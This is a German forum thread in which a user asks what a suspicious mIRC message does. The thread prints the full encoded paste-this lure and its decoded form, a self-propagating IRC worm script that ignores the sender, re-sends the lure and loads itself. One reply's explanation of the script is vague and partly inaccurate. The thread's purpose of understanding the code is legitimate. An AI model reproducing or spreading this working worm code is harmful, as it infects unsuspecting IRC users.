Frage zu mIRC
-
Hallo manchmal werde ich angeschrieben und dann bekomme ich da solche Nachrichten:
<SuTiH> Do You Want to be an OPERATOR in #2on2.css ? copy/paste this->14 //write $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpvaW4gfCAubXNnICRuaWNrIERvIFlvdSBXYW50IHRvIGJlIGFuIE9QRVJBVE9SIGluICRjaGFuID8gY29weS9wYXN0ZSB0aGlzLT4DMTQgLy93cml0ZSCgICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyCgICRjaHIoMTI0KSAvL21vZGUgJCAkKyBtZSArUiB9,m) | .load -rs | //mode $me +RUnd dann meldet sich auch sofort der Viren Scanner hat wer eine Ahnung wie man diesen Kram entschlüsseln kann ich würde nämlich mal gerne wissen was da passieren soll ...
Das wird ja nur in einer Text Datei gespeichert der Kram.
-
Decoded: on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join | .msg $nick Do You Want to be an OPERATOR in $chan ? copy/paste this->14 //write $ $+ decode( $+ read($script,n,1),m) $+ ,m) $chr(124) .load -rs $chr(124) //mode $ $+ me +R }
-
Weiss jemand was das Script genau macht ?
Ich hab leider keine Ahnung von mIRC Scripten.
-
mr_woar schrieb:
Weiss jemand was das Script genau macht ?
Das Script sorgt dafür das du jemanden in einem Channel Operator Status gibst. Danach schickst du dieses Script an jemand anderes, der auf ignore gesetzt wird, damit es dir nicht auffällt wenn derjenige antwortet.
Zumindest so in der Art, meine Mirc scripting Zeiten sind schon etwas her.
-
Ah ok ty.
Naja ich bin eh nirgendwo im mIRC Operator oder so. ^^
-
mr_woar schrieb:
Im IRC. IRC ist ein Dienst. mIRC einer von vielen Clients.
Du surfst ja auch nicht im Firefox. Oder schaust die Simpsons im Philips.
</pedant>
-
Registrierter Troll schrieb:
mr_woar schrieb:
Im IRC. IRC ist ein Dienst. mIRC einer von vielen Clients.
Du surfst ja auch nicht im Firefox. Oder schaust die Simpsons im Philips.
</pedant>Aber ich fahre im Fiat und trinke Öttinger.